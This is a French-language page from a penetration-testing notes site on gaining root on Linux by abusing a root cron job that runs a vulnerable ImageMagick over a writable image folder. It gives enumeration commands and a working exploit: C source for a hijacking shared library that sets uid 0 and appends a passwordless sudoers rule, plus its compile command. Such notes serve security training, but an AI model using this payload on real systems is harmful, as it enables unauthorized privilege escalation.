> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/privesc/cron-jobs/imagemagick-cron-abuse-linux-privilege-escalation.md).

# Abus de cron ImageMagick - Élévation de privilèges Linux

## Ce que c’est

Les tâches cron créent des chemins d'élévation de privilèges lorsque des tâches récurrentes exécutées en tant que root lancent des scripts inscriptibles, des chemins relatifs non sûrs ou des processeurs vulnérables. L'élément clé est de prouver qu'un utilisateur à faibles privilèges contrôle quelque chose qu'une tâche planifiée privilégiée exécutera. Cette page particulière se concentre sur **Tâches cron - Exploitation d'ImageMagick** et maintient le flux d’exploitation pratique : identifiez la condition, validez-la en toute sécurité, puis exécutez la charge utile minimale nécessaire pour prouver l’impact.

## Énumération

Commencez par confirmer le contexte local et la mauvaise configuration exacte avant d’exécuter la voie d’exploitation.

```bash
cat /etc/crontab
ls -la /etc/cron.*
systemctl list-timers --all
```

## Exemples

Dans `/opt/`, vous pouvez trouver un `script.sh` script exécuté automatiquement

<figure><img src="/files/fa8134cd398d7e967fc0d1d6d5bfe881aa1beb4f" alt=""><figcaption></figcaption></figure>

```bash
cd /opt/app/static/assets/images
truncate -s 0 metadata.log
find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify >> metadata.log
```

> Ce script shell commence par se déplacer vers le `/opt/app/static/assets/images` dossier puis vide le `metadata.log` fichier s'il existe. Ensuite, il recherche tous les `.jpg` fichiers dans ce répertoire et utilise la commande d'ImageMagick `identify` pour extraire leurs métadonnées (taille, format, profondeur de couleur, etc.). Cette information est ensuite stockée dans `metadata.log`. Ainsi, ce script génère un fichier de métadonnées mis à jour pour toutes les images JPG du dossier spécifié.

Le script utilise **ImageMagick**, une version vulnérable.

```bash
magicks --version
```

<figure><img src="/files/4dc29b452f59daec933f9a7d353ae71f92a4923e" alt=""><figcaption></figcaption></figure>

### Exploitation via `LD_PRELOAD`

Nous créons un `a.c` fichier :

```c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("echo 'developer ALL=(ALL) NOPASSWD:ALL' | sudo tee -a /etc/sudoers");
}
```

Compilation :

```bash
gcc -fPIC -shared -o ./libxcb.so.1 a.c -nostartfiles
```

<figure><img src="/files/2c60cc4ccab9da62aac892468b2a457a3ea4138a" alt=""><figcaption></figcaption></figure>

Il est ajouté au répertoire surveillé et exécutable par `ImageMagick`. Puis nous exécutons :

```bash
su root
```

<figure><img src="/files/71d6862b5a003c898fc95752843f86489e0c8514" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/privesc/cron-jobs/imagemagick-cron-abuse-linux-privilege-escalation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
